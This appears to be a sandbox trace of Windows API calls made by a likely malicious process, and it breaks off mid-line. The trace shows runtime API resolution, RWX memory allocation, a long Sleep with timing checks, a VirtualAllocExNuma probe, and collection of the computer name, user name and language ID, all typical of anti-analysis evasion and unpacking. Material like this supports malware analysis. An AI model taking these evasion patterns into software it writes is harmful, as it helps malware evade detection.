SetErrorMode (uMode=0x2) returned 0x2 [0192.664] SetErrorMode (uMode=0x2) returned 0x2 [0192.670] SetErrorMode (uMode=0x2) returned 0x2 [0192.678] SetErrorMode (uMode=0x2) returned 0x2 [0192.687] SetErrorMode (uMode=0x2) returned 0x2 [0192.692] SetErrorMode (uMode=0x2) returned 0x2 [0192.697] SetErrorMode (uMode=0x2) returned 0x2 [0192.702] SetErrorMode (uMode=0x2) returned 0x2 [0192.707] SetErrorMode (uMode=0x2) returned 0x2 [0192.715] SetErrorMode (uMode=0x2) returned 0x2 [0192.721] SetErrorMode (uMode=0x2) returned 0x2 [0192.726] SetErrorMode (uMode=0x2) returned 0x2 [0192.732] SetErrorMode (uMode=0x2) returned 0x2 [0192.737] SetErrorMode (uMode=0x2) returned 0x2 [0192.743] SetErrorMode (uMode=0x2) returned 0x2 [0192.748] SetErrorMode (uMode=0x2) returned 0x2 [0192.755] SetErrorMode (uMode=0x2) returned 0x2 [0192.762] SetErrorMode (uMode=0x2) returned 0x2 [0192.767] SetErrorMode (uMode=0x2) returned 0x2 [0192.773] SetErrorMode (uMode=0x2) returned 0x2 [0192.779] SetErrorMode (uMode=0x2) returned 0x2 [0192.784] SetErrorMode (uMode=0x2) returned 0x2 [0192.792] SetErrorMode (uMode=0x2) returned 0x2 [0192.797] SetErrorMode (uMode=0x2) returned 0x2 [0192.802] SetErrorMode (uMode=0x2) returned 0x2 [0192.807] SetErrorMode (uMode=0x2) returned 0x2 [0192.813] SetErrorMode (uMode=0x2) returned 0x2 [0192.817] SetErrorMode (uMode=0x2) returned 0x2 [0192.823] SetErrorMode (uMode=0x2) returned 0x2 [0192.829] SetErrorMode (uMode=0x2) returned 0x2 [0192.834] SetErrorMode (uMode=0x2) returned 0x2 [0192.839] SetErrorMode (uMode=0x2) returned 0x2 [0192.844] SetErrorMode (uMode=0x2) returned 0x2 [0192.849] SetErrorMode (uMode=0x2) returned 0x2 [0192.854] SetErrorMode (uMode=0x2) returned 0x2 [0192.860] SetErrorMode (uMode=0x2) returned 0x2 [0192.874] SetErrorMode (uMode=0x2) returned 0x2 [0192.879] SetErrorMode (uMode=0x2) returned 0x2 [0192.884] SetErrorMode (uMode=0x2) returned 0x2 [0192.889] SetErrorMode (uMode=0x2) returned 0x2 [0192.894] SetErrorMode (uMode=0x2) returned 0x2 [0192.899] SetErrorMode (uMode=0x2) returned 0x2 [0192.904] SetErrorMode (uMode=0x2) returned 0x2 [0192.986] SetErrorMode (uMode=0x2) returned 0x2 [0192.991] SetErrorMode (uMode=0x2) returned 0x2 [0192.997] SetErrorMode (uMode=0x2) returned 0x2 [0193.002] SetErrorMode (uMode=0x2) returned 0x2 [0193.007] SetErrorMode (uMode=0x2) returned 0x2 [0193.013] SetErrorMode (uMode=0x2) returned 0x2 [0193.074] SetErrorMode (uMode=0x2) returned 0x2 [0193.080] SetErrorMode (uMode=0x2) returned 0x2 [0193.086] SetErrorMode (uMode=0x2) returned 0x2 [0193.092] SetErrorMode (uMode=0x2) returned 0x2 [0193.122] SetErrorMode (uMode=0x2) returned 0x2 [0193.129] SetErrorMode (uMode=0x2) returned 0x2 [0193.164] SetErrorMode (uMode=0x2) returned 0x2 [0193.170] SetErrorMode (uMode=0x2) returned 0x2 [0193.177] SetErrorMode (uMode=0x2) returned 0x2 [0193.182] SetErrorMode (uMode=0x2) returned 0x2 [0193.188] SetErrorMode (uMode=0x2) returned 0x2 [0193.193] SetErrorMode (uMode=0x2) returned 0x2 [0193.215] SetErrorMode (uMode=0x2) returned 0x2 [0193.222] SetErrorMode (uMode=0x2) returned 0x2 [0193.229] SetErrorMode (uMode=0x2) returned 0x2 [0193.237] SetErrorMode (uMode=0x2) returned 0x2 [0193.244] SetErrorMode (uMode=0x2) returned 0x2 [0193.307] SetErrorMode (uMode=0x2) returned 0x2 [0193.314] SetErrorMode (uMode=0x2) returned 0x2 [0193.321] SetErrorMode (uMode=0x2) returned 0x2 [0193.328] SetErrorMode (uMode=0x2) returned 0x2 [0193.335] SetErrorMode (uMode=0x2) returned 0x2 [0193.353] SetErrorMode (uMode=0x2) returned 0x2 [0193.359] SetErrorMode (uMode=0x2) returned 0x2 [0193.363] SetErrorMode (uMode=0x2) returned 0x2 [0193.369] SetErrorMode (uMode=0x2) returned 0x2 [0193.374] SetErrorMode (uMode=0x2) returned 0x2 [0193.379] SetErrorMode (uMode=0x2) returned 0x2 [0193.384] SetErrorMode (uMode=0x2) returned 0x2 [0193.391] SetErrorMode (uMode=0x2) returned 0x2 [0193.396] SetErrorMode (uMode=0x2) returned 0x2 [0193.402] SetErrorMode (uMode=0x2) returned 0x2 [0193.408] SetErrorMode (uMode=0x2) returned 0x2 [0193.413] SetErrorMode (uMode=0x2) returned 0x2 [0193.418] SetErrorMode (uMode=0x2) returned 0x2 [0193.475] SetErrorMode (uMode=0x2) returned 0x2 [0193.481] SetErrorMode (uMode=0x2) returned 0x2 [0193.487] SetErrorMode (uMode=0x2) returned 0x2 [0193.493] SetErrorMode (uMode=0x2) returned 0x2 [0193.498] SetErrorMode (uMode=0x2) returned 0x2 [0193.503] SetErrorMode (uMode=0x2) returned 0x2 [0193.508] SetErrorMode (uMode=0x2) returned 0x2 [0193.571] SetErrorMode (uMode=0x2) returned 0x2 [0193.584] SetErrorMode (uMode=0x2) returned 0x2 [0193.590] SetErrorMode (uMode=0x2) returned 0x2 [0193.595] SetErrorMode (uMode=0x2) returned 0x2 [0193.605] SetErrorMode (uMode=0x2) returned 0x2 [0193.627] SetErrorMode (uMode=0x2) returned 0x2 [0193.633] SetErrorMode (uMode=0x2) returned 0x2 [0193.639] SetErrorMode (uMode=0x2) returned 0x2 [0193.645] SetErrorMode (uMode=0x2) returned 0x2 [0193.650] SetErrorMode (uMode=0x2) returned 0x2 [0193.656] SetErrorMode (uMode=0x2) returned 0x2 [0193.661] SetErrorMode (uMode=0x2) returned 0x2 [0193.671] SetErrorMode (uMode=0x2) returned 0x2 [0193.678] SetErrorMode (uMode=0x2) returned 0x2 [0193.685] SetErrorMode (uMode=0x2) returned 0x2 [0193.690] SetErrorMode (uMode=0x2) returned 0x2 [0193.696] SetErrorMode (uMode=0x2) returned 0x2 [0193.706] SetErrorMode (uMode=0x2) returned 0x2 [0193.712] SetErrorMode (uMode=0x2) returned 0x2 [0193.717] SetErrorMode (uMode=0x2) returned 0x2 [0193.723] SetErrorMode (uMode=0x2) returned 0x2 [0193.730] SetErrorMode (uMode=0x2) returned 0x2 [0193.735] SetErrorMode (uMode=0x2) returned 0x2 [0193.742] SetErrorMode (uMode=0x2) returned 0x2 [0193.747] SetErrorMode (uMode=0x2) returned 0x2 [0193.753] SetErrorMode (uMode=0x2) returned 0x2 [0193.759] SetErrorMode (uMode=0x2) returned 0x2 [0193.766] SetErrorMode (uMode=0x2) returned 0x2 [0193.773] SetErrorMode (uMode=0x2) returned 0x2 [0193.782] SetErrorMode (uMode=0x2) returned 0x2 [0193.788] SetErrorMode (uMode=0x2) returned 0x2 [0193.795] SetErrorMode (uMode=0x2) returned 0x2 [0193.801] SetErrorMode (uMode=0x2) returned 0x2 [0193.811] SetErrorMode (uMode=0x2) returned 0x2 [0193.819] SetErrorMode (uMode=0x2) returned 0x2 [0193.824] SetErrorMode (uMode=0x2) returned 0x2 [0193.829] SetErrorMode (uMode=0x2) returned 0x2 [0193.834] SetErrorMode (uMode=0x2) returned 0x2 [0193.839] SetErrorMode (uMode=0x2) returned 0x2 [0193.844] SetErrorMode (uMode=0x2) returned 0x2 [0193.851] SetErrorMode (uMode=0x2) returned 0x2 [0193.856] SetErrorMode (uMode=0x2) returned 0x2 [0193.861] SetErrorMode (uMode=0x2) returned 0x2 [0193.866] SetErrorMode (uMode=0x2) returned 0x2 [0193.872] SetErrorMode (uMode=0x2) returned 0x2 [0193.877] SetErrorMode (uMode=0x2) returned 0x2 [0193.882] SetErrorMode (uMode=0x2) returned 0x2 [0193.890] SetErrorMode (uMode=0x2) returned 0x2 [0193.895] SetErrorMode (uMode=0x2) returned 0x2 [0193.901] SetErrorMode (uMode=0x2) returned 0x2 [0193.906] SetErrorMode (uMode=0x2) returned 0x2 [0193.912] SetErrorMode (uMode=0x2) returned 0x2 [0193.919] SetErrorMode (uMode=0x2) returned 0x2 [0193.928] SetErrorMode (uMode=0x2) returned 0x2 [0193.935] SetErrorMode (uMode=0x2) returned 0x2 [0193.942] SetErrorMode (uMode=0x2) returned 0x2 [0193.949] SetErrorMode (uMode=0x2) returned 0x2 [0193.956] SetErrorMode (uMode=0x2) returned 0x2 [0193.981] SetErrorMode (uMode=0x2) returned 0x2 [0193.989] SetErrorMode (uMode=0x2) returned 0x2 [0193.995] SetErrorMode (uMode=0x2) returned 0x2 [0194.002] SetErrorMode (uMode=0x2) returned 0x2 [0194.009] SetErrorMode (uMode=0x2) returned 0x2 [0194.017] SetErrorMode (uMode=0x2) returned 0x2 [0194.025] SetErrorMode (uMode=0x2) returned 0x2 [0194.032] SetErrorMode (uMode=0x2) returned 0x2 [0194.039] SetErrorMode (uMode=0x2) returned 0x2 [0194.045] SetErrorMode (uMode=0x2) returned 0x2 [0194.054] SetErrorMode (uMode=0x2) returned 0x2 [0194.061] SetErrorMode (uMode=0x2) returned 0x2 [0194.069] SetErrorMode (uMode=0x2) returned 0x2 [0194.076] SetErrorMode (uMode=0x2) returned 0x2 [0194.083] SetErrorMode (uMode=0x2) returned 0x2 [0194.092] SetErrorMode (uMode=0x2) returned 0x2 [0194.136] SetErrorMode (uMode=0x2) returned 0x2 [0194.143] SetErrorMode (uMode=0x2) returned 0x2 [0194.150] SetErrorMode (uMode=0x2) returned 0x2 [0194.156] SetErrorMode (uMode=0x2) returned 0x2 [0194.197] GetProcAddress (hModule=0x75480000, lpProcName="LoadLibraryExA") returned 0x7552cb90 [0194.198] LoadLibraryExA (lpLibFileName="kernel32.dll", hFile=0x0, dwFlags=0x0) returned 0x75600000 [0194.198] GetProcAddress (hModule=0x75600000, lpProcName="GetProcAddress") returned 0x756178b0 [0194.199] GetProcAddress (hModule=0x75600000, lpProcName="VirtualAlloc") returned 0x75617810 [0194.199] GetProcAddress (hModule=0x75600000, lpProcName="VirtualFree") returned 0x75617600 [0194.199] GetProcAddress (hModule=0x75600000, lpProcName="UnmapViewOfFile") returned 0x75619b20 [0194.199] GetProcAddress (hModule=0x75600000, lpProcName="VirtualProtect") returned 0x75617a50 [0194.199] GetProcAddress (hModule=0x75600000, lpProcName="LoadLibraryExA") returned 0x7561a270 [0194.199] GetProcAddress (hModule=0x75600000, lpProcName="GetModuleHandleA") returned 0x756199f0 [0194.200] GetProcAddress (hModule=0x75600000, lpProcName="GetModuleHandleW") returned 0x75619bc0 [0194.200] GetProcAddress (hModule=0x75600000, lpProcName="CreateFileA") returned 0x75626880 [0194.200] GetProcAddress (hModule=0x75600000, lpProcName="SetFilePointer") returned 0x75626c40 [0194.200] GetProcAddress (hModule=0x75600000, lpProcName="WriteFile") returned 0x75626ca0 [0194.200] GetProcAddress (hModule=0x75600000, lpProcName="CloseHandle") returned 0x75626630 [0194.200] GetProcAddress (hModule=0x75600000, lpProcName="GetTempPathA") returned 0x75626b20 [0194.200] GetProcAddress (hModule=0x75600000, lpProcName="lstrlenA") returned 0x75618c80 [0194.200] GetProcAddress (hModule=0x75600000, lpProcName="lstrcatA") returned 0x7561f640 [0194.201] GetProcAddress (hModule=0x75600000, lpProcName="FreeLibrary") returned 0x75619f50 [0194.201] GetModuleHandleA (lpModuleName=0x0) returned 0x400000 [0194.201] GetProcAddress (hModule=0x75480000, lpProcName="VirtualAlloc") returned 0x7553c630 [0194.201] VirtualAlloc (lpAddress=0x0, dwSize=0x27a00, flAllocationType=0x3000, flProtect=0x40) returned 0x670000 [0194.207] VirtualProtect (in: lpAddress=0x400000, dwSize=0x3c000, flNewProtect=0x40, lpflOldProtect=0x19fb9c | out: lpflOldProtect=0x19fb9c*=0x2) returned 1 [0194.507] LoadLibraryExA (lpLibFileName="msvcrt.dll", hFile=0x0, dwFlags=0x0) returned 0x748c0000 [0194.507] GetProcAddress (hModule=0x748c0000, lpProcName="_mbsstr") returned 0x749149a0 [0194.507] GetProcAddress (hModule=0x748c0000, lpProcName="memset") returned 0x74948c80 [0194.507] GetProcAddress (hModule=0x748c0000, lpProcName="_mbsnbcpy") returned 0x74911d90 [0194.508] VirtualProtect (in: lpAddress=0x401000, dwSize=0x1c7bb, flNewProtect=0x510160, lpflOldProtect=0x19fb9c | out: lpflOldProtect=0x19fb9c*=0x2) returned 0 [0194.786] VirtualProtect (in: lpAddress=0x41e000, dwSize=0x8564, flNewProtect=0x510140, lpflOldProtect=0x19fb9c | out: lpflOldProtect=0x19fb9c*=0x2) returned 0 [0194.787] VirtualProtect (in: lpAddress=0x427000, dwSize=0x117f4, flNewProtect=0x510148, lpflOldProtect=0x19fb9c | out: lpflOldProtect=0x19fb9c*=0x2) returned 0 [0194.788] VirtualProtect (in: lpAddress=0x439000, dwSize=0x251e, flNewProtect=0x510140, lpflOldProtect=0x19fb9c | out: lpflOldProtect=0x19fb9c*=0x2) returned 0 [0194.794] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c1f38 [0194.794] VirtualProtect (in: lpAddress=0x6c1f38, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.805] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c2010 [0194.805] VirtualProtect (in: lpAddress=0x6c2010, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.808] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c2070 [0194.808] VirtualProtect (in: lpAddress=0x6c2070, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.809] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c2100 [0194.809] VirtualProtect (in: lpAddress=0x6c2100, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.810] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c21a8 [0194.810] VirtualProtect (in: lpAddress=0x6c21a8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.811] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c21c0 [0194.811] VirtualProtect (in: lpAddress=0x6c21c0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.812] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x6b5a68 [0194.812] VirtualProtect (in: lpAddress=0x6b5a68, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.813] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6ba0a0 [0194.813] VirtualProtect (in: lpAddress=0x6ba0a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.814] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c2148 [0194.814] VirtualProtect (in: lpAddress=0x6c2148, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.815] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c2118 [0194.815] VirtualProtect (in: lpAddress=0x6c2118, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.816] LocalAlloc (uFlags=0x40, uBytes=0xa) returned 0x6c2130 [0194.816] VirtualProtect (in: lpAddress=0x6c2130, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.818] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c2190 [0194.818] VirtualProtect (in: lpAddress=0x6c2190, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.818] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6ba2e0 [0194.818] VirtualProtect (in: lpAddress=0x6ba2e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.844] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c2160 [0194.844] VirtualProtect (in: lpAddress=0x6c2160, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.845] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x6ba0e0 [0194.845] VirtualProtect (in: lpAddress=0x6ba0e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.846] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x6ba140 [0194.846] VirtualProtect (in: lpAddress=0x6ba140, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.847] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c2178 [0194.847] VirtualProtect (in: lpAddress=0x6c2178, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.847] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6ba160 [0194.847] VirtualProtect (in: lpAddress=0x6ba160, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.848] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x6b6808 [0194.848] VirtualProtect (in: lpAddress=0x6b6808, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.849] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6bf750 [0194.849] VirtualProtect (in: lpAddress=0x6bf750, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0194.852] GetProcAddress (hModule=0x75600000, lpProcName="GetTickCount") returned 0x75625eb0 [0194.852] GetProcAddress (hModule=0x75600000, lpProcName="Sleep") returned 0x75617990 [0194.852] GetProcAddress (hModule=0x75600000, lpProcName="GetUserDefaultLangID") returned 0x7561ff30 [0194.852] GetProcAddress (hModule=0x75600000, lpProcName="CreateMutexA") returned 0x756266c0 [0194.852] GetProcAddress (hModule=0x75600000, lpProcName="GetLastError") returned 0x75613870 [0194.852] GetProcAddress (hModule=0x75600000, lpProcName="ExitProcess") returned 0x75627b30 [0194.852] GetProcAddress (hModule=0x75600000, lpProcName="HeapAlloc") returned 0x77752bd0 [0194.852] GetProcAddress (hModule=0x75600000, lpProcName="GetProcessHeap") returned 0x75617710 [0194.852] GetProcAddress (hModule=0x75600000, lpProcName="GetComputerNameA") returned 0x7561fbf0 [0194.852] GetProcAddress (hModule=0x75600000, lpProcName="GetCurrentProcess") returned 0x756138c0 [0194.853] GetProcAddress (hModule=0x75600000, lpProcName="VirtualAllocExNuma") returned 0x75642710 [0194.853] LoadLibraryA (lpLibFileName="advapi32.dll") returned 0x74650000 [0194.853] LoadLibraryA (lpLibFileName="crypt32.dll") returned 0x775a0000 [0195.999] GetProcAddress (hModule=0x74650000, lpProcName="GetUserNameA") returned 0x74672910 [0195.999] GetProcAddress (hModule=0x775a0000, lpProcName="CryptStringToBinaryA") returned 0x775bd6d0 [0196.001] GetCurrentProcess () returned 0xffffffff [0196.001] VirtualAllocExNuma (hProcess=0xffffffff, lpAddress=0x0, dwSize=0x1388, flAllocationType=0x3000, flProtect=0x40, nndPreferred=0x0) returned 0x540000 [0196.001] GetTickCount () returned 0x15d030b [0196.001] Sleep (dwMilliseconds=0x3e80) [0206.003] GetTickCount () returned 0x15d419b [0206.003] GetUserDefaultLangID () returned 0x409 [0206.021] GetProcessHeap () returned 0x6b0000 [0206.021] RtlAllocateHeap (HeapHandle=0x6b0000, Flags=0x0, Size=0x104) returned 0x6b69d8 [0206.021] GetComputerNameA (in: lpBuffer=0x6b69d8, nSize=0x19ff3c | out: lpBuffer="XC64ZB", nSize=0x19ff3c) returned 1 [0206.024] CreateMutexA (lpMutexAttributes=0x0, bInitialOwner=0, lpName=0x0) returned 0xcc [0206.024] GetLastError () returned 0x0 [0206.027] LocalAlloc (uFlags=0x40, uBytes=0x14) returned 0x6ba1a0 [0206.027] VirtualProtect (in: lpAddress=0x6ba1a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.034] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6b6ae8 [0206.034] VirtualProtect (in: lpAddress=0x6b6ae8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.038] LocalAlloc (uFlags=0x40, uBytes=0xe) returned 0x6c2370 [0206.038] VirtualProtect (in: lpAddress=0x6c2370, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.040] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c48e0 [0206.040] VirtualProtect (in: lpAddress=0x6c48e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.046] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6c2310 [0206.046] VirtualProtect (in: lpAddress=0x6c2310, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.047] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6c0198 [0206.047] VirtualProtect (in: lpAddress=0x6c0198, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.048] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x6c4aa0 [0206.048] VirtualProtect (in: lpAddress=0x6c4aa0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.053] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6bf188 [0206.053] VirtualProtect (in: lpAddress=0x6bf188, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.057] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c2430 [0206.057] VirtualProtect (in: lpAddress=0x6c2430, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.058] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x6ba960 [0206.058] VirtualProtect (in: lpAddress=0x6ba960, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.061] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c23a0 [0206.061] VirtualProtect (in: lpAddress=0x6c23a0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.068] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x6ba988 [0206.068] VirtualProtect (in: lpAddress=0x6ba988, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.069] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c2478 [0206.069] VirtualProtect (in: lpAddress=0x6c2478, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.070] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x6bab40 [0206.070] VirtualProtect (in: lpAddress=0x6bab40, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.071] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c23b8 [0206.071] VirtualProtect (in: lpAddress=0x6c23b8, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.072] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x6baa00 [0206.072] VirtualProtect (in: lpAddress=0x6baa00, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.076] LocalAlloc (uFlags=0x40, uBytes=0x9) returned 0x6c2208 [0206.076] VirtualProtect (in: lpAddress=0x6c2208, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.076] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x6c4960 [0206.076] VirtualProtect (in: lpAddress=0x6c4960, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.077] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c22e0 [0206.077] VirtualProtect (in: lpAddress=0x6c22e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.079] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x6baa28 [0206.079] VirtualProtect (in: lpAddress=0x6baa28, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.080] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x6c47e0 [0206.080] VirtualProtect (in: lpAddress=0x6c47e0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.081] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x6baaa0 [0206.081] VirtualProtect (in: lpAddress=0x6baaa0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.084] LocalAlloc (uFlags=0x40, uBytes=0x5) returned 0x6bef60 [0206.084] VirtualProtect (in: lpAddress=0x6bef60, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.085] LocalAlloc (uFlags=0x40, uBytes=0x6) returned 0x6bef70 [0206.085] VirtualProtect (in: lpAddress=0x6bef70, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.086] LocalAlloc (uFlags=0x40, uBytes=0x8) returned 0x6bf450 [0206.086] VirtualProtect (in: lpAddress=0x6bf450, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.087] LocalAlloc (uFlags=0x40, uBytes=0x12) returned 0x6c4780 [0206.087] VirtualProtect (in: lpAddress=0x6c4780, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.088] LocalAlloc (uFlags=0x40, uBytes=0xf) returned 0x6c2448 [0206.088] VirtualProtect (in: lpAddress=0x6c2448, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.093] LocalAlloc (uFlags=0x40, uBytes=0xd) returned 0x6c2490 [0206.093] VirtualProtect (in: lpAddress=0x6c2490, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.095] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x6c23d0 [0206.095] VirtualProtect (in: lpAddress=0x6c23d0, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.121] LocalAlloc (uFlags=0x40, uBytes=0x13) returned 0x6c4a60 [0206.121] VirtualProtect (in: lpAddress=0x6c4a60, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.122] LocalAlloc (uFlags=0x40, uBytes=0x15) returned 0x6c4a40 [0206.122] VirtualProtect (in: lpAddress=0x6c4a40, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.123] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c2220 [0206.123] VirtualProtect (in: lpAddress=0x6c2220, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 | out: lpflOldProtect=0x19ff38*=0x0) returned 0 [0206.128] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x6c2238 [0206.128] VirtualProtect (in: lpAddress=0x6c2238, dwSize=0x4, flNewProtect=0x100, lpflOldProtect=0x19ff38 